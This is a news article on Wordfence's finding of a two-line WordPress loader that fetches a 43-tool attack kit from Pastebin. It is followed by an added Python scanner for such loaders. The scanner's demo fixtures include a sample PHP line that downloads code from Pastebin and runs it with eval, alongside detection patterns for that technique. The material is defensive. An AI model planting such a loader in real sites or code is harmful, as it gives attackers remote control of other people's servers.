Wordfence, maker of one of the most widely used security tools for WordPress, has demonstrated a highly sophisticated WordPress hack attack. The team at Wordfence recently found a number of attack tools that all pointed back to a single “meta script”, which consists of only two lines of code but gives an attacker a powerful capability to cause damage.
Once the script fully installs itself, it gives attackers what Wordfence calls an “attack platform”. Wordfence's investigation revealed that the script downloads its full source code, which the attacker(s) had posted on Pastebin. Downloading and executing the script remotely in this way lets the attacker(s) keep the initially infected code only two lines long.
According to Wordfence, the source of these attacks appears to be a hacking group in Vietnam and one individual within that group.
The “attack platform” can provide an attacker with a suite of 43 attack tools which can be downloaded from Pastebin with a single click.
The attack tools can provide the following functionality:
Complete attack shells that let you manage the filesystem, access the database through a well-designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMSs, view and manage user accounts both on CMSs and the local operating system, and much more.
An FTP brute force attack tool
A Facebook brute force attacker
A WordPress brute force attack script
Tools to scan for config files or sensitive information
Tools to download the entire site or parts thereof
The ability to scan for other attackers' shells
Tools targeting specific CMSs that let you change their configuration to host your own malicious code
Watch the video demonstration of this hack posted by Wordfence below.
If you think your site might have fallen victim to such an attack, it is advisable to take down your site and seek expert help to stop the infection from spreading further.
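One way to check a site's PHP files for the loader pattern described above, a very short file that fetches code from Pastebin and executes it. This is an added example, not code from the article or from Wordfence; the article does not reproduce the script, so the regular expressions, the five-line threshold and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumed indicators: the article does not show the script, so these describe
# the general "fetch from a paste site, then execute" shape it reports.
PASTE_HOST = re.compile(r"pastebin\.com", re.I)
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|curl_exec|fopen|fsockopen|wp_remote_get)\s*\(", re.I)
DYNAMIC_EXEC = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
SMALL_FILE_LINES = 5  # assumed cut-off for "only a few lines long"

def classify(source: str):
    """Return 'high', 'medium' or None for the text of one PHP file."""
    fetch, execs, paste = (bool(p.search(source))
                           for p in (REMOTE_FETCH, DYNAMIC_EXEC, PASTE_HOST))
    if not (fetch and execs):
        return None
    if paste:
        return "high"    # fetches from a paste site and executes the result
    code_lines = [line for line in source.splitlines() if line.strip()]
    return "medium" if len(code_lines) <= SMALL_FILE_LINES else None

def scan_tree(root):
    """Walk a site directory and map suspicious PHP files to a verdict."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        verdict = classify(path.read_text(errors="replace"))
        if verdict:
            hits[path.relative_to(root).as_posix()] = verdict
    return hits

def demo():
    # Constructed sample files, not taken from the incident.
    samples = {
        "wp-content/uploads/cache.php":
            "<?php\neval(file_get_contents('https://pastebin.com/raw/PLACEHOLDER'));\n",
        "wp-includes/feed.php":
            "<?php\n$body = wp_remote_get($url);\necho esc_html($title);\n",
        "wp-content/plugins/x/loader.php":
            "<?php\n$c = file_get_contents($u);\neval($c);\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, text in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(text)
        return scan_tree(tmp)

if __name__ == "__main__":
    print(demo())
```

Point `scan_tree` at the WordPress document root and treat matches as leads for manual review; an obfuscated loader will not match these plain-text patterns, so a clean result does not prove the site is clean.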